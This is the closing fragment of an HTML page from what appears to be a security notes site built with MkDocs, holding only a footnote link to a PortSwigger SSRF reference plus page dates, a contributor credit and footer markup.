<p><a href="https://portswigger.net/web-security/ssrf">Server-side request forgery (SSRF)</a>&#160;<a class="footnote-backref" href="#fnref:ssrf" title="Jump back to footnote 3 in the text">&#8617;</a></p>
</li>
</ol>
</div>







  
    
  
  
    
  


  <aside class="md-source-file">
    
      
  <span class="md-source-file__fact">
    <span class="md-icon" title="Last update">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
    </span>
    <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">September 25, 2024</span>
  </span>

    
    
      
  <span class="md-source-file__fact">
    <span class="md-icon" title="Created">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.47 15.08 11 13V7h1.5v5.25l3.08 1.83c-.41.28-.79.62-1.11 1m-1.39 4.84c-.36.05-.71.08-1.08.08-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8c0 .37-.03.72-.08 1.08.69.1 1.33.32 1.92.64.1-.56.16-1.13.16-1.72 0-5.5-4.5-10-10-10S2 6.5 2 12s4.47 10 10 10c.59 0 1.16-.06 1.72-.16-.32-.59-.54-1.23-.64-1.92M18 15v3h-3v2h3v3h2v-3h3v-2h-3v-3z"/></svg>
    </span>
    <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">September 25, 2024</span>
  </span>

    
    
      
  
  <span class="md-source-file__fact">
    <span class="md-icon" title="Contributors">
      
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 4a4 4 0 0 1 4 4 4 4 0 0 1-4 4 4 4 0 0 1-4-4 4 4 0 0 1 4-4m0 10c4.42 0 8 1.79 8 4v2H4v-2c0-2.21 3.58-4 8-4"/></svg>
      
    </span>
    <nav>
      
        <a href="mailto:techbrunch@users.noreply.github.com">Techbrunch</a>
    </nav>
  </span>

    
    
  </aside>



  



      
    </article>
  </div>

          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
        <div class="md-social">
  
    
    
    
    
      
      
    
    <a href="https://twitter.com/techbrunchfr" target="_blank" rel="noopener" title="twitter.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253"/></svg>
    </a>
  
    
    
    
    
      
      
    
    <a href="https://github.com/Techbrunch" target="_blank" rel="noopener" title="github.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    <script id="__config" type="application/json">{"base": "../..", "features": ["content.code.annotate", "header.autohide", "announce.dismiss"], "search": "../../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
    
    
      <script src="../../assets/javascripts/bundle.d6f25eb3.min.js"></script>
      
    
  </body>
</html>